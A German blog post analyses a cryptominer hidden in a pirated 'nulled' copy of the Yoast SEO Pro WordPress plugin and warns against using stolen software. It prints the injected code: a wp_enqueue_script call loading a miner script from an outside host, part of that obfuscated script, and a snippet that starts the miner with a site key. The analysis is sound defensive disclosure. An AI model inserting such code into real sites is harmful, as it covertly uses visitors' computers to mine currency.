Cryptominer in Yoast Pro WordPress Plugin gefunden

Um es gleich vorwegzunehmen, es handelt sich um das „Yoast SEO Pro WordPress Plugin v11.3 NULLED“ welches seit 25.6.2019 auf Piratebay als Torrent heruntergeladen werden kann.

Diese Tatsache führt mich gleich zu Beginn zu folgendem wichtigen Hinweis:

Niemals gestohlene Software verwenden und schon gar nicht in Livesystemen.

Das Finden der Malware in diesem WordPress Plugin war ziemlich einfach, da bereits Avira in der aktuellen Version aufschrie.

Worum handelt es sich?

Es handelt sich bei dem Ordnerinhalt durchaus um das besagte Plugin. Auch die Pro-Features dürften problemlos funktionieren.

Zusätzlich hat der Inverkehrbringer einen JavaScript-Cryptominer in das Plugin integriert, welches im Browser bei jedem Websitebesucher ausgeführt wird.

Funktionsweise

Mit wp_enqueue_script wird zuerst eine Datei von www.hostingcloud.racing geladen, welche den JavaScript-Cryptominer enthält.

wp_enqueue_script( 'wp-internal', 'https://www.hostingcloud.racing/08GN.js', false, false, true );

Gekürzter Dateiinhalt. Minified und obfuscated.

var a=['TMOWwoTCh8Oi','w7pAccKqwo4=','aMK4VwPDghfDgFzDuA==','E8O/M8KRTnJB','AMOQw50Cw4kHwro=','L8KKYSs4ShXDuA==','QEfDuTFONsK7wql6','I0rCiGxubXrCrMOEwrg=','FcO6HyRwKMKcwoE=','w6PDpcOrwoAUw4UsJ3LCt8OS','FT

Mit einer weiteren wp_enqueue-Funktion wird ein lokaler Authentifizierungspart geladen, welche sich in der Datei /assets/js/wp-core.js befindet. Dort ist nur hinterlegt für welchen Account die wertvollen Crypowährungen (Bitcoin, Litecoin, Ether, …) geschürft werden.

wp_enqueue_script( 'wp-backend', plugins_url() . '/wordpress-seo-premium/assets/js/wp-core.js', false, false, true );

Dateiinhalt

var _client = new Client.Anonymous('f0e4d39d281f1c25a988f96cce62f81266ce7463ba93e61e7121297700b6599a', {
        throttle: 0.8, ads: 0
    });
    _client.start();

Sei sozial und teile

Über den Autor Andreas Grundner

Ich bin Wordpress, Joomla, Typo3 Integrator, Unix Rootserver Administrator und Webanwendungsprogrammierer. Mittlerweile habe ich über 70 Webprojekte weitgehend selbstständig mit enger Kundenabsprache realisiert. Ich bin auf One Page Websites auf Wordpress-Basis spezialisiert, biete aber auch Suchmaschinenoptimierung (SEO), Blogs, Facebook, Youtube und Google+ Seiten an. Meine Verpflichtung gilt dem Datenschutz, meine Leidenschaft dem Finden und Aufzeigen von Sicherheitslücken in Webanwendungen.

Meinung sagen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.